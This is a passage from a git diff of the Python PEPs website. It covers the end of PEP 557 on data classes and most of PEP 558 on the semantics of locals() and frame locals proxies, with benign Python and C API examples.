The other place where dataclass inspects a type annotation is to +determine if a field is an init-only variable. It does this by seeing +if the type of a field is of type dataclasses.InitVar. If a field +is an InitVar, it is considered a pseudo-field called an init-only +field. As it is not a true field, it is not returned by the +module-level fields() function. Init-only fields are added as +parameters to the generated __init__ method, and are passed to +the optional __post_init__ method. They are not otherwise used +by Data Classes.

+

For example, suppose a field will be initialized from a database, if a +value is not provided when creating the class:

+
@dataclass
+class C:
+    i: int
+    j: int = None
+    database: InitVar[DatabaseType] = None
+
+    def __post_init__(self, database):
+        if self.j is None and database is not None:
+            self.j = database.lookup('j')
+
+c = C(10, database=my_database)
+
+
+

In this case, fields() will return Field objects for i and +j, but not for database.

+
+
+

Frozen instances

+

It is not possible to create truly immutable Python objects. However, +by passing frozen=True to the @dataclass decorator you can +emulate immutability. In that case, Data Classes will add +__setattr__ and __delattr__ methods to the class. These +methods will raise a FrozenInstanceError when invoked.

+

There is a tiny performance penalty when using frozen=True: +__init__ cannot use simple assignment to initialize fields, and +must use object.__setattr__.

+
+
+

Inheritance

+

When the Data Class is being created by the @dataclass decorator, +it looks through all of the class’s base classes in reverse MRO (that +is, starting at object) and, for each Data Class that it finds, +adds the fields from that base class to an ordered mapping of fields. +After all of the base class fields are added, it adds its own fields +to the ordered mapping. All of the generated methods will use this +combined, calculated ordered mapping of fields. Because the fields +are in insertion order, derived classes override base classes. An +example:

+
@dataclass
+class Base:
+    x: Any = 15.0
+    y: int = 0
+
+@dataclass
+class C(Base):
+    z: int = 10
+    x: int = 15
+
+
+

The final list of fields is, in order, x, y, z. The final +type of x is int, as specified in class C.

+

The generated __init__ method for C will look like:

+
def __init__(self, x: int = 15, y: int = 0, z: int = 10):
+
+
+
+
+

Default factory functions

+

If a field specifies a default_factory, it is called with zero +arguments when a default value for the field is needed. For example, +to create a new instance of a list, use:

+
l: list = field(default_factory=list)
+
+
+

If a field is excluded from __init__ (using init=False) and +the field also specifies default_factory, then the default factory +function will always be called from the generated __init__ +function. This happens because there is no other way to give the +field an initial value.

+
+
+

Mutable default values

+

Python stores default member variable values in class attributes. +Consider this example, not using Data Classes:

+
class C:
+    x = []
+    def add(self, element):
+        self.x += element
+
+o1 = C()
+o2 = C()
+o1.add(1)
+o2.add(2)
+assert o1.x == [1, 2]
+assert o1.x is o2.x
+
+
+

Note that the two instances of class C share the same class +variable x, as expected.

+

Using Data Classes, if this code was valid:

+
@dataclass
+class D:
+    x: List = []
+    def add(self, element):
+        self.x += element
+
+
+

it would generate code similar to:

+
class D:
+    x = []
+    def __init__(self, x=x):
+        self.x = x
+    def add(self, element):
+        self.x += element
+
+assert D().x is D().x
+
+
+

This has the same issue as the original example using class C. +That is, two instances of class D that do not specify a value for +x when creating a class instance will share the same copy of +x. Because Data Classes just use normal Python class creation +they also share this problem. There is no general way for Data +Classes to detect this condition. Instead, Data Classes will raise a +TypeError if it detects a default parameter of type list, +dict, or set. This is a partial solution, but it does protect +against many common errors. See Automatically support mutable +default values in the Rejected Ideas section for more details.

+

Using default factory functions is a way to create new instances of +mutable types as default values for fields:

+
@dataclass
+class D:
+    x: list = field(default_factory=list)
+
+assert D().x is not D().x
+
+
+
+
+

Module level helper functions

+
    +
  • fields(class_or_instance): Returns a tuple of Field objects +that define the fields for this Data Class. Accepts either a Data +Class, or an instance of a Data Class. Raises ValueError if not +passed a Data Class or instance of one. Does not return +pseudo-fields which are ClassVar or InitVar.
  • +
  • asdict(instance, *, dict_factory=dict): Converts the Data Class +instance to a dict (by using the factory function +dict_factory). Each Data Class is converted to a dict of its +fields, as name:value pairs. Data Classes, dicts, lists, and tuples +are recursed into. For example:
    @dataclass
    +class Point:
    +     x: int
    +     y: int
    +
    +@dataclass
    +class C:
    +     l: List[Point]
    +
    +p = Point(10, 20)
    +assert asdict(p) == {'x': 10, 'y': 20}
    +
    +c = C([Point(0, 0), Point(10, 4)])
    +assert asdict(c) == {'l': [{'x': 0, 'y': 0}, {'x': 10, 'y': 4}]}
    +
    +
    +

    Raises TypeError if instance is not a Data Class instance.

    +
  • +
  • astuple(*, tuple_factory=tuple): Converts the Data Class +instance to a tuple (by using the factory function +tuple_factory). Each Data Class is converted to a tuple of its +field values. Data Classes, dicts, lists, and tuples are recursed +into.

    Continuing from the previous example:

    +
    assert astuple(p) == (10, 20)
    +assert astuple(c) == ([(0, 0), (10, 4)],)
    +
    +
    +

    Raises TypeError if instance is not a Data Class instance.

    +
  • +
  • make_dataclass(cls_name, fields, *, bases=(), namespace=None): +Creates a new Data Class with name cls_name, fields as defined +in fields, base classes as given in bases, and initialized +with a namespace as given in namespace. fields is an +iterable whose elements are either name, (name, type), or +(name, type, Field). If just name is supplied, +typing.Any is used for type. This function is not strictly +required, because any Python mechanism for creating a new class with +__annotations__ can then apply the dataclass function to +convert that class to a Data Class. This function is provided as a +convenience. For example:
    C = make_dataclass('C',
    +                   [('x', int),
    +                     'y',
    +                    ('z', int, field(default=5))],
    +                   namespace={'add_one': lambda self: self.x + 1})
    +
    +
    +

    Is equivalent to:

    +
    @dataclass
    +class C:
    +    x: int
    +    y: 'typing.Any'
    +    z: int = 5
    +
    +    def add_one(self):
    +        return self.x + 1
    +
    +
    +
  • +
  • replace(instance, **changes): Creates a new object of the same +type of instance, replacing fields with values from changes. +If instance is not a Data Class, raises TypeError. If +values in changes do not specify fields, raises TypeError.

    The newly returned object is created by calling the __init__ +method of the Data Class. This ensures that +__post_init__, if present, is also called.

    +

    Init-only variables without default values, if any exist, must be +specified on the call to replace so that they can be passed to +__init__ and __post_init__.

    +

    It is an error for changes to contain any fields that are +defined as having init=False. A ValueError will be raised +in this case.

    +

    Be forewarned about how init=False fields work during a call to +replace(). They are not copied from the source object, but +rather are initialized in __post_init__(), if they’re +initialized at all. It is expected that init=False fields will +be rarely and judiciously used. If they are used, it might be wise +to have alternate class constructors, or perhaps a custom +replace() (or similarly named) method which handles instance +copying.

    +
  • +
  • is_dataclass(class_or_instance): Returns True if its parameter +is a dataclass or an instance of one, otherwise returns False.

    If you need to know if a class is an instance of a dataclass (and +not a dataclass itself), then add a further check for not +isinstance(obj, type):

    +
    def is_dataclass_instance(obj):
    +    return is_dataclass(obj) and not isinstance(obj, type)
    +
    +
    +
  • +
+
+
+
+

Discussion

+
+

python-ideas discussion

+

This discussion started on python-ideas [9] and was moved to a GitHub +repo [10] for further discussion. As part of this discussion, we made +the decision to use PEP 526 syntax to drive the discovery of fields.

+
+
+

Support for automatically setting __slots__?

+

At least for the initial release, __slots__ will not be supported. +__slots__ needs to be added at class creation time. The Data +Class decorator is called after the class is created, so in order to +add __slots__ the decorator would have to create a new class, set +__slots__, and return it. Because this behavior is somewhat +surprising, the initial version of Data Classes will not support +automatically setting __slots__. There are a number of +workarounds:

+
    +
  • Manually add __slots__ in the class definition.
  • +
  • Write a function (which could be used as a decorator) that inspects +the class using fields() and creates a new class with +__slots__ set.
  • +
+

For more discussion, see [11].

+
+
+

Why not just use namedtuple?

+
    +
  • Any namedtuple can be accidentally compared to any other with the +same number of fields. For example: Point3D(2017, 6, 2) == +Date(2017, 6, 2). With Data Classes, this would return False.
  • +
  • A namedtuple can be accidentally compared to a tuple. For example, +Point2D(1, 10) == (1, 10). With Data Classes, this would return +False.
  • +
  • Instances are always iterable, which can make it difficult to add +fields. If a library defines:
    Time = namedtuple('Time', ['hour', 'minute'])
    +def get_time():
    +    return Time(12, 0)
    +
    +
    +

    Then if a user uses this code as:

    +
    hour, minute = get_time()
    +
    +
    +

    then it would not be possible to add a second field to Time +without breaking the user’s code.

    +
  • +
  • No option for mutable instances.
  • +
  • Cannot specify default values.
  • +
  • Cannot control which fields are used for __init__, __repr__, +etc.
  • +
  • Cannot support combining fields by inheritance.
  • +
+
+
+

Why not just use typing.NamedTuple?

+

For classes with statically defined fields, it does support similar +syntax to Data Classes, using type annotations. This produces a +namedtuple, so it shares namedtuples benefits and some of its +downsides. Data Classes, unlike typing.NamedTuple, support +combining fields via inheritance.

+
+
+

Why not just use attrs?

+
    +
  • attrs moves faster than could be accommodated if it were moved in to +the standard library.
  • +
  • attrs supports additional features not being proposed here: +validators, converters, metadata, etc. Data Classes makes a +tradeoff to achieve simplicity by not implementing these +features.
  • +
+

For more discussion, see [12].

+
+
+

post-init parameters

+

In an earlier version of this PEP before InitVar was added, the +post-init function __post_init__ never took any parameters.

+

The normal way of doing parameterized initialization (and not just +with Data Classes) is to provide an alternate classmethod constructor. +For example:

+
@dataclass
+class C:
+    x: int
+
+    @classmethod
+    def from_file(cls, filename):
+        with open(filename) as fl:
+            file_value = int(fl.read())
+        return C(file_value)
+
+c = C.from_file('file.txt')
+
+
+

Because the __post_init__ function is the last thing called in the +generated __init__, having a classmethod constructor (which can +also execute code immediately after constructing the object) is +functionally equivalent to being able to pass parameters to a +__post_init__ function.

+

With InitVars, __post_init__ functions can now take +parameters. They are passed first to __init__ which passes them +to __post_init__ where user code can use them as needed.

+

The only real difference between alternate classmethod constructors +and InitVar pseudo-fields is in regards to required non-field +parameters during object creation. With InitVars, using +__init__ and the module-level replace() function InitVars +must always be specified. Consider the case where a context +object is needed to create an instance, but isn’t stored as a field. +With alternate classmethod constructors the context parameter is +always optional, because you could still create the object by going +through __init__ (unless you suppress its creation). Which +approach is more appropriate will be application-specific, but both +approaches are supported.

+

Another reason for using InitVar fields is that the class author +can control the order of __init__ parameters. This is especially +important with regular fields and InitVar fields that have default +values, as all fields with defaults must come after all fields without +defaults. A previous design had all init-only fields coming after +regular fields. This meant that if any field had a default value, +then all init-only fields would have to have defaults values, too.

+
+
+

asdict and astuple function names

+

The names of the module-level helper functions asdict() and +astuple() are arguably not PEP 8 compliant, and should be +as_dict() and as_tuple(), respectively. However, after +discussion [13] it was decided to keep consistency with +namedtuple._asdict() and attr.asdict().

+
+
+
+

Rejected ideas

+
+

Copying init=False fields after new object creation in replace()

+

Fields that are init=False are by definition not passed to +__init__, but instead are initialized with a default value, or by +calling a default factory function in __init__, or by code in +__post_init__.

+

A previous version of this PEP specified that init=False fields +would be copied from the source object to the newly created object +after __init__ returned, but that was deemed to be inconsistent +with using __init__ and __post_init__ to initialize the new +object. For example, consider this case:

+
@dataclass
+class Square:
+    length: float
+    area: float = field(init=False, default=0.0)
+
+    def __post_init__(self):
+        self.area = self.length * self.length
+
+s1 = Square(1.0)
+s2 = replace(s1, length=2.0)
+
+
+

If init=False fields were copied from the source to the +destination object after __post_init__ is run, then s2 would end +up begin Square(length=2.0, area=1.0), instead of the correct +Square(length=2.0, area=4.0).

+
+
+

Automatically support mutable default values

+

One proposal was to automatically copy defaults, so that if a literal +list [] was a default value, each instance would get a new list. +There were undesirable side effects of this decision, so the final +decision is to disallow the 3 known built-in mutable types: list, +dict, and set. For a complete discussion of this and other options, +see [14].

+
+
+
+

Examples

+
+

Custom __init__ method

+

Sometimes the generated __init__ method does not suffice. For +example, suppose you wanted to have an object to store *args and +**kwargs:

+
@dataclass(init=False)
+class ArgHolder:
+    args: List[Any]
+    kwargs: Mapping[Any, Any]
+
+    def __init__(self, *args, **kwargs):
+        self.args = args
+        self.kwargs = kwargs
+
+a = ArgHolder(1, 2, three=3)
+
+
+
+
+

A complicated example

+

This code exists in a closed source project:

+
class Application:
+    def __init__(self, name, requirements, constraints=None, path='', executable_links=None, executables_dir=()):
+        self.name = name
+        self.requirements = requirements
+        self.constraints = {} if constraints is None else constraints
+        self.path = path
+        self.executable_links = [] if executable_links is None else executable_links
+        self.executables_dir = executables_dir
+        self.additional_items = []
+
+    def __repr__(self):
+        return f'Application({self.name!r},{self.requirements!r},{self.constraints!r},{self.path!r},{self.executable_links!r},{self.executables_dir!r},{self.additional_items!r})'
+
+
+

This can be replaced by:

+
@dataclass
+class Application:
+    name: str
+    requirements: List[Requirement]
+    constraints: Dict[str, str] = field(default_factory=dict)
+    path: str = ''
+    executable_links: List[str] = field(default_factory=list)
+    executable_dir: Tuple[str] = ()
+    additional_items: List[str] = field(init=False, default_factory=list)
+
+
+

The Data Class version is more declarative, has less code, supports +typing, and includes the other generated functions.

+
+
+
+

Acknowledgements

+

The following people provided invaluable input during the development +of this PEP and code: Ivan Levkivskyi, Guido van Rossum, Hynek +Schlawack, Raymond Hettinger, and Lisa Roach. I thank them for their +time and expertise.

+

A special mention must be made about the attrs project. It was a +true inspiration for this PEP, and I respect the design decisions they +made.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0557.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0558/index.html b/pep-0558/index.html new file mode 100644 index 00000000000..6ca58fd0f18 --- /dev/null +++ b/pep-0558/index.html @@ -0,0 +1,1641 @@ + + + + + + + + PEP 558 – Defined semantics for locals() | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 558 – Defined semantics for locals()

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
BDFL-Delegate:
+
Nathaniel J. Smith
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
08-Sep-2017
+
Python-Version:
+
3.13
+
Post-History:
+
08-Sep-2017, 22-May-2019, 30-May-2019, 30-Dec-2019, 18-Jul-2021, +26-Aug-2021
+
+
+
+
Table of Contents +
+
+

PEP Withdrawal

+

In December 2021, this PEP and PEP 667 converged on a common definition of the +proposed changes to the Python level semantics of the locals() builtin (as +documented in the PEP text below), with the only remaining differences being +in the proposed C API changes and various internal implementation details.

+

Of those remaining differences, the most significant one was that PEP 667 +at the time still proposed an immediate backwards compatibility break for the +PyEval_GetLocals() API as soon as the PEP was accepted and implemented.

+

PEP 667 has since been changed to propose a generous deprecation period for +the PyEval_GetLocals() API, continuing to support it in parallel with the +improved semantics offered by the new PyEval_GetFrameLocals() API.

+

Any remaining C API design concerns relate to new informational APIs that can be +added at a later date if they are deemed necessary, and any potential concerns +about the exact performance characteristics of the frame locals view implementation +are outweighed by the availability of a viable reference implementation.

+

Accordingly, this PEP has been withdrawn in favour of proceeding with PEP 667.

+

Note: while implementing PEP 667 it became apparent that the rationale for and impact +of locals() being updated to return independent snapshots in +optimized scopes was not entirely clear in either PEP. +The Motivation and Rationale sections in this PEP have been updated accordingly (since those +aspects are equally applicable to the accepted PEP 667).

+
+
+

Abstract

+

The semantics of the locals() builtin have historically been underspecified +and hence implementation dependent.

+

This PEP proposes formally standardising on the behaviour of the CPython 3.10 +reference implementation for most execution scopes, with some adjustments to the +behaviour at function scope to make it more predictable and independent of the +presence or absence of tracing functions.

+

In addition, it proposes that the following functions be added to the stable +Python C API/ABI:

+
typedef enum {
+  PyLocals_UNDEFINED = -1,
+  PyLocals_DIRECT_REFERENCE = 0,
+  PyLocals_SHALLOW_COPY = 1,
+  _PyLocals_ENSURE_32BIT_ENUM = 2147483647
+} PyLocals_Kind;
+
+PyLocals_Kind PyLocals_GetKind();
+PyObject * PyLocals_Get();
+PyObject * PyLocals_GetCopy();
+
+
+

It also proposes the addition of several supporting functions and type +definitions to the CPython C API.

+
+
+

Motivation

+

While the precise semantics of the locals() builtin are nominally undefined, +in practice, many Python programs depend on it behaving exactly as it behaves in +CPython (at least when no tracing functions are installed).

+

Other implementations such as PyPy are currently replicating that behaviour, +up to and including replication of local variable mutation bugs that +can arise when a trace hook is installed [1].

+

While this PEP considers CPython’s current behaviour when no trace hooks are +installed to be largely acceptable, it considers the current +behaviour when trace hooks are installed to be problematic, as it causes bugs +like [1] without even reliably enabling the desired functionality of allowing +debuggers like pdb to mutate local variables [3].

+

Review of the initial PEP and the draft implementation then identified an +opportunity for simplification of both the documentation and implementation +of the function level locals() behaviour by updating it to return an +independent snapshot of the function locals and closure variables on each +call, rather than continuing to return the semi-dynamic intermittently updated +shared copy that it has historically returned in CPython.

+

Specifically, the proposal in this PEP eliminates the historical behaviour where +adding a new local variable can change the behaviour of code executed with +exec() in function scopes, even if that code runs before the local variable +is defined.

+

For example:

+
def f():
+    exec("x = 1")
+    print(locals().get("x"))
+f()
+
+
+

prints 1, but:

+
def f():
+    exec("x = 1")
+    print(locals().get("x"))
+    x = 0
+f()
+
+
+

prints None (the default value from the .get() call).

+

With this PEP both examples would print None, as the call to +exec() and the subsequent call to locals() would use +independent dictionary snapshots of the local variables rather +than using the same shared dictionary cached on the frame object.

+
+
+

Proposal

+

The expected semantics of the locals() builtin change based on the current +execution scope. For this purpose, the defined scopes of execution are:

+
    +
  • module scope: top-level module code, as well as any other code executed using +exec() or eval() with a single namespace
  • +
  • class scope: code in the body of a class statement, as well as any other +code executed using exec() or eval() with separate local and global +namespaces
  • +
  • function scope: code in the body of a def or async def statement, +or any other construct that creates an optimized code block in CPython (e.g. +comprehensions, lambda functions)
  • +
+

This PEP proposes elevating most of the current behaviour of the CPython +reference implementation to become part of the language specification, except +that each call to locals() at function scope will create a new dictionary +object, rather than caching a common dict instance in the frame object that +each invocation will update and return.

+

This PEP also proposes to largely eliminate the concept of a separate “tracing” +mode from the CPython reference implementation. In releases up to and including +Python 3.10, the CPython interpreter behaves differently when a trace hook has +been registered in one or more threads via an implementation dependent mechanism +like sys.settrace ([4]) in CPython’s sys module or +PyEval_SetTrace ([5]) in CPython’s C API. If this PEP is accepted, then +the only remaining behavioural difference when a trace hook is installed is that +some optimisations in the interpreter eval loop are disabled when the tracing +logic needs to run after each opcode.

+

This PEP proposes changes to CPython’s behaviour at function scope that make +the locals() builtin semantics when a trace hook is registered identical to +those used when no trace hook is registered, while also making the related frame +API semantics clearer and easier for interactive debuggers to rely on.

+

The proposed elimination of tracing mode affects the semantics of frame object +references obtained through other means, such as via a traceback, or via the +sys._getframe() API, as the write-through semantics needed for trace hook +support are always provided by the f_locals attribute on frame objects, +rather than being runtime state dependent.

+
+

New locals() documentation

+

The heart of this proposal is to revise the documentation for the locals() +builtin to read as follows:

+
+
Return a mapping object representing the current local symbol table, with +variable names as the keys, and their currently bound references as the +values.

At module scope, as well as when using exec() or eval() with a +single namespace, this function returns the same namespace as globals().

+

At class scope, it returns the namespace that will be passed to the +metaclass constructor.

+

When using exec() or eval() with separate local and global +namespaces, it returns the local namespace passed in to the function call.

+

In all of the above cases, each call to locals() in a given frame of +execution will return the same mapping object. Changes made through +the mapping object returned from locals() will be visible as bound, +rebound, or deleted local variables, and binding, rebinding, or deleting +local variables will immediately affect the contents of the returned mapping +object.

+

At function scope (including for generators and coroutines), each call to +locals() instead returns a fresh dictionary containing the current +bindings of the function’s local variables and any nonlocal cell references. +In this case, name binding changes made via the returned dict are not +written back to the corresponding local variables or nonlocal cell +references, and binding, rebinding, or deleting local variables and nonlocal +cell references does not affect the contents of previously returned +dictionaries.

+
+

There would also be a versionchanged note for the release making this change:

+
+
In prior versions, the semantics of mutating the mapping object returned +from locals() were formally undefined. In CPython specifically, +the mapping returned at function scope could be implicitly refreshed by +other operations, such as calling locals() again, or the interpreter +implicitly invoking a Python level trace function. Obtaining the legacy +CPython behaviour now requires explicit calls to update the initially +returned dictionary with the results of subsequent calls to locals().
+

For reference, the current documentation of this builtin reads as follows:

+
+
Update and return a dictionary representing the current local symbol table. +Free variables are returned by locals() when it is called in function +blocks, but not in class blocks.

Note: The contents of this dictionary should not be modified; changes may +not affect the values of local and free variables used by the interpreter.

+
+

(In other words: the status quo is that the semantics and behaviour of +locals() are formally implementation defined, whereas the proposed +state after this PEP is that the only implementation defined behaviour will be +that associated with whether or not the implementation emulates the CPython +frame API, with the behaviour in all other cases being defined by the language +and library references)

+
+
+

Module scope

+

At module scope, as well as when using exec() or eval() with a +single namespace, locals() must return the same object as globals(), +which must be the actual execution namespace (available as +inspect.currentframe().f_locals in implementations that provide access +to frame objects).

+

Variable assignments during subsequent code execution in the same scope must +dynamically change the contents of the returned mapping, and changes to the +returned mapping must change the values bound to local variable names in the +execution environment.

+

To capture this expectation as part of the language specification, the following +paragraph will be added to the documentation for locals():

+
+
At module scope, as well as when using exec() or eval() with a +single namespace, this function returns the same namespace as globals().
+

This part of the proposal does not require any changes to the reference +implementation - it is standardisation of the current behaviour.

+
+
+

Class scope

+

At class scope, as well as when using exec() or eval() with separate +global and local namespaces, locals() must return the specified local +namespace (which may be supplied by the metaclass __prepare__ method +in the case of classes). As for module scope, this must be a direct reference +to the actual execution namespace (available as +inspect.currentframe().f_locals in implementations that provide access +to frame objects).

+

Variable assignments during subsequent code execution in the same scope must +change the contents of the returned mapping, and changes to the returned mapping +must change the values bound to local variable names in the +execution environment.

+

The mapping returned by locals() will not be used as the actual class +namespace underlying the defined class (the class creation process will copy +the contents to a fresh dictionary that is only accessible by going through the +class machinery).

+

For nested classes defined inside a function, any nonlocal cells referenced from +the class scope are not included in the locals() mapping.

+

To capture this expectation as part of the language specification, the following +two paragraphs will be added to the documentation for locals():

+
+
When using exec() or eval() with separate local and global +namespaces, [this function] returns the given local namespace.

At class scope, it returns the namespace that will be passed to the metaclass +constructor.

+
+

This part of the proposal does not require any changes to the reference +implementation - it is standardisation of the current behaviour.

+
+
+

Function scope

+

At function scope, interpreter implementations are granted significant freedom +to optimise local variable access, and hence are NOT required to permit +arbitrary modification of local and nonlocal variable bindings through the +mapping returned from locals().

+

Historically, this leniency has been described in the language specification +with the words “The contents of this dictionary should not be modified; changes +may not affect the values of local and free variables used by the interpreter.”

+

This PEP proposes to change that text to instead say:

+
+
At function scope (including for generators and coroutines), each call to +locals() instead returns a fresh dictionary containing the current +bindings of the function’s local variables and any nonlocal cell references. +In this case, name binding changes made via the returned dict are not +written back to the corresponding local variables or nonlocal cell +references, and binding, rebinding, or deleting local variables and nonlocal +cell references does not affect the contents of previously returned +dictionaries.
+

This part of the proposal does require changes to the CPython reference +implementation, as CPython currently returns a shared mapping object that may +be implicitly refreshed by additional calls to locals(), and the +“write back” strategy currently used to support namespace changes +from trace functions also doesn’t comply with it (and causes the quirky +behavioural problems mentioned in the Motivation above).

+
+
+
+

CPython Implementation Changes

+
+

Summary of proposed implementation-specific changes

+
    +
  • Changes are made as necessary to provide the updated Python level semantics
  • +
  • Two new functions are added to the stable ABI to replicate the updated +behaviour of the Python locals() builtin:
  • +
+
PyObject * PyLocals_Get();
+PyLocals_Kind PyLocals_GetKind();
+
+
+
    +
  • One new function is added to the stable ABI to efficiently get a snapshot of +the local namespace in the running frame:
  • +
+
PyObject * PyLocals_GetCopy();
+
+
+
    +
  • Corresponding frame accessor functions for these new public APIs are added to +the CPython frame C API
  • +
  • On optimised frames, the Python level f_locals API will return dynamically +created read/write proxy objects that directly access the frame’s local and +closure variable storage. To provide interoperability with the existing +PyEval_GetLocals() API, the proxy objects will continue to use the C level +frame locals data storage field to hold a value cache that also allows for +storage of arbitrary additional keys. Additional details on the expected +behaviour of these fast locals proxy objects are covered below.
  • +
  • No C API function is added to get access to a mutable mapping for the local +namespace. Instead, PyObject_GetAttrString(frame, "f_locals") is used, the +same API as is used in Python code.
  • +
  • PyEval_GetLocals() remains supported and does not emit a programmatic +warning, but will be deprecated in the documentation in favour of the new +APIs that don’t rely on returning a borrowed reference
  • +
  • PyFrame_FastToLocals() and PyFrame_FastToLocalsWithError() remain +supported and do not emit a programmatic warning, but will be deprecated in +the documentation in favour of the new APIs that don’t require direct access +to the internal data storage layout of frame objects
  • +
  • PyFrame_LocalsToFast() always raises RuntimeError(), indicating that +PyObject_GetAttrString(frame, "f_locals") should be used to obtain a +mutable read/write mapping for the local variables.
  • +
  • The trace hook implementation will no longer call PyFrame_FastToLocals() +implicitly. The version porting guide will recommend migrating to +PyFrame_GetLocals() for read-only access and +PyObject_GetAttrString(frame, "f_locals") for read/write access.
  • +
+
+
+

Providing the updated Python level semantics

+

The implementation of the locals() builtin is modified to return a distinct +copy of the local namespace for optimised frames, rather than a direct reference +to the internal frame value cache updated by the PyFrame_FastToLocals() C +API and returned by the PyEval_GetLocals() C API.

+
+
+

Resolving the issues with tracing mode behaviour

+

The current cause of CPython’s tracing mode quirks (both the side effects from +simply installing a tracing function and the fact that writing values back to +function locals only works for the specific function being traced) is the way +that locals mutation support for trace hooks is currently implemented: the +PyFrame_LocalsToFast function.

+

When a trace function is installed, CPython currently does the following for +function frames (those where the code object uses “fast locals” semantics):

+
    +
  1. Calls PyFrame_FastToLocals to update the frame value cache
  2. +
  3. Calls the trace hook (with tracing of the hook itself disabled)
  4. +
  5. Calls PyFrame_LocalsToFast to capture any changes made to the frame +value cache
  6. +
+

This approach is problematic for a few different reasons:

+
    +
  • Even if the trace function doesn’t mutate the value cache, the final step +resets any cell references back to the state they were in before the trace +function was called (this is the root cause of the bug report in [1])
  • +
  • If the trace function does mutate the value cache, but then does something +that causes the value cache to be refreshed from the frame, those changes are +lost (this is one aspect of the bug report in [3])
  • +
  • If the trace function attempts to mutate the local variables of a frame other +than the one being traced (e.g. frame.f_back.f_locals), those changes +will almost certainly be lost (this is another aspect of the bug report in +[3])
  • +
  • If a reference to the frame value cache (e.g. retrieved via locals()) is +passed to another function, and that function mutates the value cache, then +those changes may be written back to the execution frame if a trace hook +is installed
  • +
+

The proposed resolution to this problem is to take advantage of the fact that +whereas functions typically access their own namespace using the language +defined locals() builtin, trace functions necessarily use the implementation +dependent frame.f_locals interface, as a frame reference is what gets +passed to hook implementations.

+

Instead of being a direct reference to the internal frame value cache historically +returned by the locals() builtin, the Python level frame.f_locals will be +updated to instead return instances of a dedicated fast locals proxy type that +writes and reads values directly to and from the fast locals array on the +underlying frame. Each access of the attribute produces a new instance of the +proxy (so creating proxy instances is intentionally a cheap operation).

+

Despite the new proxy type becoming the preferred way to access local variables +on optimised frames, the internal value cache stored on the frame is still +retained for two key purposes:

+
    +
  • maintaining backwards compatibility for and interoperability with the +PyEval_GetLocals() C API
  • +
  • providing storage space for additional keys that don’t have slots in the +fast locals array (e.g. the __return__ and __exception__ keys set by +pdb when tracing code execution for debugging purposes)
  • +
+

With the changes in this PEP, this internal frame value cache is no longer +directly accessible from Python code (whereas historically it was both +returned by the locals() builtin and available as the frame.f_locals +attribute). Instead, the value cache is only accessible via the +PyEval_GetLocals() C API and by directly accessing the internal storage of +a frame object.

+

Fast locals proxy objects and the internal frame value cache returned by +PyEval_GetLocals() offer the following behavioural guarantees:

+
    +
  • changes made via a fast locals proxy will be immediately visible to the frame +itself, to other fast locals proxy objects for the same frame, and in the +internal value cache stored on the frame (it is this last point that provides +PyEval_GetLocals() interoperability)
  • +
  • changes made directly to the internal frame value cache will never be visible +to the frame itself, and will only be reliably visible via fast locals proxies +for the same frame if the change relates to extra variables that don’t have +slots in the frame’s fast locals array
  • +
  • changes made by executing code in the frame will be immediately visible to all +fast locals proxy objects for that frame (both existing proxies and newly +created ones). Visibility in the internal frame value cache cache returned +by PyEval_GetLocals() is subject to the cache update guidelines discussed +in the next section
  • +
+

As a result of these points, only code using PyEval_GetLocals(), +PyLocals_Get(), or PyLocals_GetCopy() will need to be concerned about +the frame value cache potentially becoming stale. Code using the new frame fast +locals proxy API (whether from Python or from C) will always see the live state +of the frame.

+
+
+

Fast locals proxy implementation details

+

Each fast locals proxy instance has a single internal attribute that is not +exposed as part of the Python runtime API:

+
    +
  • frame: the underlying optimised frame that the proxy provides access to
  • +
+

In addition, proxy instances use and update the following attributes stored on the +underlying frame or code object:

+
    +
  • _name_to_offset_mapping: a hidden mapping from variable names to fast local +storage offsets. This mapping is lazily initialized on the first frame read or +write access through a fast locals proxy, rather than being eagerly populated +as soon as the first fast locals proxy is created. Since the mapping is +identical for all frames running a given code object, a single copy is stored +on the code object, rather than each frame object populating its own mapping
  • +
  • locals: the internal frame value cache returned by the PyEval_GetLocals() +C API and updated by the PyFrame_FastToLocals() C API. This is the mapping +that the locals() builtin returns in Python 3.10 and earlier.
  • +
+

__getitem__ operations on the proxy will populate the _name_to_offset_mapping +on the code object (if it is not already populated), and then either return the +relevant value (if the key is found in either the _name_to_offset_mapping +mapping or the internal frame value cache), or else raise KeyError. Variables +that are defined on the frame but not currently bound also raise KeyError +(just as they’re omitted from the result of locals()).

+

As the frame storage is always accessed directly, the proxy will automatically +pick up name binding and unbinding operations that take place as the function +executes. The internal value cache is implicitly updated when individual +variables are read from the frame state (including for containment checks, +which need to check if the name is currently bound or unbound).

+

Similarly, __setitem__ and __delitem__ operations on the proxy will +directly affect the corresponding fast local or cell reference on the underlying +frame, ensuring that changes are immediately visible to the running Python code, +rather than needing to be written back to the runtime storage at some later time. +Such changes are also immediately written to the internal frame value cache to +make them visible to users of the PyEval_GetLocals() C API.

+

Keys that are not defined as local or closure variables on the underlying frame +are still written to the internal value cache on optimised frames. This allows +utilities like pdb (which writes __return__ and __exception__ +values into the frame’s f_locals mapping) to continue working as they always +have. These additional keys that do not correspond to a local or closure +variable on the frame will be left alone by future cache sync operations. +Using the frame value cache to store these extra keys (rather than defining a +new mapping that holds only the extra keys) provides full interoperability +with the existing PyEval_GetLocals() API (since users of either API will +see extra keys added by users of either API, rather than users of the new fast +locals proxy API only seeing keys added via that API).

+

An additional benefit of storing only the variable value cache on the frame +(rather than storing an instance of the proxy type), is that it avoids +creating a reference cycle from the frame back to itself, so the frame will +only be kept alive if another object retains a reference to a proxy instance.

+

